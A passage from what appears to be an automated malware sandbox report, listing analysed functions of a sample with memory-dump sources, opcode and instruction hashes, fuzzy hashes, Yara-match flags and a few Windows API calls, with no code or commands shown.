                                                                                                                                                                                                                    • Opcode ID: 35661873d35cf4f8716ac815e441bee8707f6a5940d0966b78fa6e68816bc911
                                                                                                                                                                                                                    • Instruction ID: 4ecf60513b44854932d0be6511e3bb29c99c3ae1e1ad43fe707cf94a5984de06
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 35661873d35cf4f8716ac815e441bee8707f6a5940d0966b78fa6e68816bc911
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F9B1E47050C3E18BD7358F2994607ABBFE1EF97304F1889ADD4D99B292CB754806CB52
                                                                                                                                                                                                                    Function 00B0EF6D Relevance: 1.6, Strings: 1, Instructions: 350COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "7
                                                                                                                                                                                                                    • API String ID: 0-1591144912
                                                                                                                                                                                                                    • Opcode ID: 1c620da236318be6c2630bccc2c73e716dbec5fb3ea60899035f1b99130df550
                                                                                                                                                                                                                    • Instruction ID: 1d12859b492e73210026b588e8665df400df38f76a3fff6760d152fdb83cee92
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c620da236318be6c2630bccc2c73e716dbec5fb3ea60899035f1b99130df550
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B127726483814BD7358A24CC827EBBBD2EFDA314F184A7CD0C997783E6798416870A
                                                                                                                                                                                                                    Function 00B2D82C Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 2?#2
                                                                                                                                                                                                                    • API String ID: 0-573533050
                                                                                                                                                                                                                    • Opcode ID: e1ae8dd32569bb6ed73e9b0d11a6dc1ba8be50b83cf2a1552b047df8e7522eff
                                                                                                                                                                                                                    • Instruction ID: 2b5593d1ad6a247b92ca56e83fcf9ef2283c919ed398d0f5baef78990560bbf5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1ae8dd32569bb6ed73e9b0d11a6dc1ba8be50b83cf2a1552b047df8e7522eff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3A1D27050C3A18BD735CF29946076BBFE1EF97300F1889ADE4D99B282DB758906CB52
                                                                                                                                                                                                                    Function 003A6DD4 Relevance: 1.6, APIs: 1, Instructions: 87timeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(00000000,00000010,00000000,00000000), ref: 003A6DE0
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: SystemTime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2656138-0
                                                                                                                                                                                                                    • Opcode ID: 8c1dd643816c4b178a56dd0f45c03f7e640c63b387e8a3be1b499e8a49f6bf31
                                                                                                                                                                                                                    • Instruction ID: dbded27e82974a60cbbc9ca07b1b6e0f40f009262fdb65c1b16fa04cd394b21a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c1dd643816c4b178a56dd0f45c03f7e640c63b387e8a3be1b499e8a49f6bf31
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 512142C5B5022076D91A33AA9C1FF7F65BDDBCBF51F00050DB642AF1C1E9A58D4082B5
                                                                                                                                                                                                                    Function 003A2826 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 003A284A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                                                    • Opcode ID: 6f147222d5ddcde98198f3beec317373b86f6c5061cb5b0d0c15afc62dddff9d
                                                                                                                                                                                                                    • Instruction ID: 684b23763a149e01efc6432bc059b0cea531c0102e7de4cde1e071ec53f343f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f147222d5ddcde98198f3beec317373b86f6c5061cb5b0d0c15afc62dddff9d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3119131A001149FEF26EFA8D8486AF77A9EB4B314F11042CF822DB255D738C9058B51
                                                                                                                                                                                                                    Function 00B076E5 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ,
                                                                                                                                                                                                                    • API String ID: 0-3772416878
                                                                                                                                                                                                                    • Opcode ID: 73a97fa2b6a4a6e99ae617ad845b61d5978ed26f2d8680854e54ae8cfa838b4f
                                                                                                                                                                                                                    • Instruction ID: 755cc0e21b5cf084229bff860c625713accdd69d7a39d5dcceda0bc853008cb5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73a97fa2b6a4a6e99ae617ad845b61d5978ed26f2d8680854e54ae8cfa838b4f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6B1297160C3819FC325CF18C88061BFFE0AFA9704F544A6DE5D997782D671EA18CB96
                                                                                                                                                                                                                    Function 00B1ECB5 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: ~
                                                                                                                                                                                                                    • API String ID: 0-1707062198
                                                                                                                                                                                                                    • Opcode ID: e423654f8c610dc644856f6f37982c56c4aaf75068658c8a4316112f8d6504dd
                                                                                                                                                                                                                    • Instruction ID: 46dc26167c2891a5f79de0f8a919f9a4401c9846e6d17c403bd62b1ed1dd39fb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e423654f8c610dc644856f6f37982c56c4aaf75068658c8a4316112f8d6504dd
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF9135329042614FDB21CE28C8802AABBD1EB95364F19C2BCECB99B3D1D635DC46D7D1
                                                                                                                                                                                                                    Function 00B28F63 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: -/
                                                                                                                                                                                                                    • API String ID: 0-3427678492
                                                                                                                                                                                                                    • Opcode ID: 5923bc72aa036b37dcc9b6ec911afa69f79a2454b70ee41baba6469da8460f3a
                                                                                                                                                                                                                    • Instruction ID: 1e4f06abc2600cf272ffb8b5315f3bd5fce9b3db344586b7bb377c9bf0049366
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5923bc72aa036b37dcc9b6ec911afa69f79a2454b70ee41baba6469da8460f3a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B391ACB1A002049FDB18DF69D99259ABFB1FF45300B5982AED845AF306D731C542CFD6
                                                                                                                                                                                                                    Function 00B1A351 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: gfff
                                                                                                                                                                                                                    • API String ID: 0-1553575800
                                                                                                                                                                                                                    • Opcode ID: b102a94e4f1bdffc5d15de769cbaef339755d377f8203806fcf5b1da2c3110b8
                                                                                                                                                                                                                    • Instruction ID: 7b563f4c902e33fe36f943a6fb5024bba294dbaf1de1693b611591be012087bf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b102a94e4f1bdffc5d15de769cbaef339755d377f8203806fcf5b1da2c3110b8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3061DF75710A018FE318CF39C865766BBE2FB95310F59C66DD056CB3A9DB78E8028B84
                                                                                                                                                                                                                    Function 00B1CA05 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: N567
                                                                                                                                                                                                                    • API String ID: 0-1234101011
                                                                                                                                                                                                                    • Opcode ID: ce301e9ad29335f7d9b3b8f7b24cf8c6381ff20892813f01b17be8075197b9c1
                                                                                                                                                                                                                    • Instruction ID: 593a0764834fb062ec49da4ab6281101811e8e335db83ede12327710cd4fdcf1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce301e9ad29335f7d9b3b8f7b24cf8c6381ff20892813f01b17be8075197b9c1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D35147715083458BC718CF25C8926BBBBF2EFD2314F08999CE0C68B351E7788946CB96
                                                                                                                                                                                                                    Function 00B18C19 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: {}
                                                                                                                                                                                                                    • API String ID: 0-4269290415
                                                                                                                                                                                                                    • Opcode ID: e0fb5f99ec2b4dc5e5a17087cbff0b866692692e077dcfbd6e736561a4f7bde5
                                                                                                                                                                                                                    • Instruction ID: 9b662ffb4980671a74f470409deaf12283768d5f5dc68c156a2e74f051c1a19e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0fb5f99ec2b4dc5e5a17087cbff0b866692692e077dcfbd6e736561a4f7bde5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F5196B1610701CBDB68DF2AC8922567BB2FF65300B6485ACD8458FB5AEB34C842CF94
                                                                                                                                                                                                                    Function 00B2C8B9 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: &$W
                                                                                                                                                                                                                    • API String ID: 0-326639317
                                                                                                                                                                                                                    • Opcode ID: 9287d4faafc66ad60e1b65ddd9d6f2b6e40bed87c2f49da04d3561f4b586703e
                                                                                                                                                                                                                    • Instruction ID: f8e58e3df45dbd1b8fb7949d822aef7aa867254653de80ea96f9ba8f0053a6e6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9287d4faafc66ad60e1b65ddd9d6f2b6e40bed87c2f49da04d3561f4b586703e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD4169A050C3F04AE7368F2994603BA7FD1EFD3345F1885EDC5C9AB286CA7944068756
                                                                                                                                                                                                                    Function 00B1D421 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: +
                                                                                                                                                                                                                    • API String ID: 0-2126386893
                                                                                                                                                                                                                    • Opcode ID: 8b31c4c15ac84875032ea4d3f4f2a89ce4d136c21276e4663e894f2df6880cc0
                                                                                                                                                                                                                    • Instruction ID: f055904d2cb4d5da9c3b53733775a1b6b7136646d9dcd006fdbf25b974b42b79
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b31c4c15ac84875032ea4d3f4f2a89ce4d136c21276e4663e894f2df6880cc0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C3135615183915BE718CF3988617BABFE19FE3310F5C599CE4D28B382DA78C54AC711
                                                                                                                                                                                                                    Function 00B292A5 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: _{|}
                                                                                                                                                                                                                    • API String ID: 0-1202748450
                                                                                                                                                                                                                    • Opcode ID: c272a1d97a163c6598c4f33c10adcda29b49df847add0d82378f291324751c1e
                                                                                                                                                                                                                    • Instruction ID: afa46f1ed8c015b0c65bc730f92423cd15fcb34e7c8c38ec2a57a54ba562f28a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c272a1d97a163c6598c4f33c10adcda29b49df847add0d82378f291324751c1e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5811903020D3619FE610CF259851B6FFBE9EBC2714F15882CA5C9EB1C6C634D60AC79A
                                                                                                                                                                                                                    Function 00B20A05 Relevance: .7, Instructions: 691COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7bb13a8f324d2e847800675d074e7a5a3ba742a6672d1c7044f8de584a93bc7a
                                                                                                                                                                                                                    • Instruction ID: 4c84b698039dba73a3e9453da80b4884b76f2147aa28c4c4522bf6bbd5c6a8f5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bb13a8f324d2e847800675d074e7a5a3ba742a6672d1c7044f8de584a93bc7a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1627EB0209B809ED325CF3C8855797BFE5AB5A314F048A5DE0EE873D2C7756105CB6A
                                                                                                                                                                                                                    Function 00B04755 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7f38716a389a8806c074c4ab240e39b3dbdd8fa01e9d8a8ae9e66512dad270ac
                                                                                                                                                                                                                    • Instruction ID: eb58de8c9e2242596230bd9cb886c4d3bfa5496ebc4cf2040ba3677a73c27bbe
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f38716a389a8806c074c4ab240e39b3dbdd8fa01e9d8a8ae9e66512dad270ac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A052E2B15083459FCB14CF18C0906AABFE1FF88314F198AADE9995B391D774EC89CB81
                                                                                                                                                                                                                    Function 00B07F25 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 65322de253cd8e8c9dbcf1075dd460e8a10cf0e83fad66befcaadb3b315baf14
                                                                                                                                                                                                                    • Instruction ID: 7338ef41e9539e7766d2020857a7aa7c33201ce6785e6f87b5e25248197d9610
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65322de253cd8e8c9dbcf1075dd460e8a10cf0e83fad66befcaadb3b315baf14
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF52E370908B848FE735CB24C4847A7BFE1EF91314F1498ADD5EB06AC2CB79AA85C705
                                                                                                                                                                                                                    Function 00B132BD Relevance: .6, Instructions: 614COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9efcf0838a6fd8f65fc209291e397d515af630530fca5bcca238ec0a87b5523a
                                                                                                                                                                                                                    • Instruction ID: 360826d4b59fbe0f6a2059629409bcffc0476b20b378580897e852fd24502e9e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9efcf0838a6fd8f65fc209291e397d515af630530fca5bcca238ec0a87b5523a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7132E4B1604B408FD714DF38C4853AABBE2AF85310F59897DD4EB873D2E634A945CB12
                                                                                                                                                                                                                    Function 00B08CF5 Relevance: .6, Instructions: 608COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f3ebc0f5c8dbbd7e571ff7d473589349e0bb2da46d055cf5f220d4e1d461fdda
                                                                                                                                                                                                                    • Instruction ID: 9f8ad84530fc5b37e29a6f4c15a6369ced932027bd3b4183d66dc54b7936ad00
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3ebc0f5c8dbbd7e571ff7d473589349e0bb2da46d055cf5f220d4e1d461fdda
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5112C5316087118BC724DF58D8817ABB7E2FFC5305F29897DD986972C2E734A916CB42
                                                                                                                                                                                                                    Function 00B05175 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 537b44b4c95565246e60379fb249d812d4d58a7e5d082b732558218ba1ea2e3b
                                                                                                                                                                                                                    • Instruction ID: b550a3d98699fd01329bd7d0cbca9913cbd72a398050ab5acc6cf97e5fdad9b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 537b44b4c95565246e60379fb249d812d4d58a7e5d082b732558218ba1ea2e3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C132F070915B108FC378CE29C59056BBBF2BF55710BA04A6ED6A78BE90D736B844CF14
                                                                                                                                                                                                                    Function 003AA13E Relevance: .5, Instructions: 501COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 5cdce912ae16fa7c2910c67f319d47321224ac57559afeb0f8abb2cd8482bd88
                                                                                                                                                                                                                    • Instruction ID: 9258412f9b698077c1b9b0b50c9a7556147db6e2dc96ae16a7fecb0936f13903
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cdce912ae16fa7c2910c67f319d47321224ac57559afeb0f8abb2cd8482bd88
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96129032D10518EFCB19CF68C5945ACBBB2EF85346F2585AAD856AB280D7309F81DF81
                                                                                                                                                                                                                    Function 00B38A05 Relevance: .5, Instructions: 487COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 5cf219bfe2d8594f18ad05bd877f8147c62a1e8db656438c57afbb6f7846bcc5
                                                                                                                                                                                                                    • Instruction ID: 4c746d3c880212b53720c8c31ca59398dd341cc9893011a15fd183b75ea89d97
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cf219bfe2d8594f18ad05bd877f8147c62a1e8db656438c57afbb6f7846bcc5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44D11872A083218BD714CF24C881A6BB7E2EBC5714F7989ACF5856B295DF31AC05C7D2
                                                                                                                                                                                                                    Function 00B07195 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
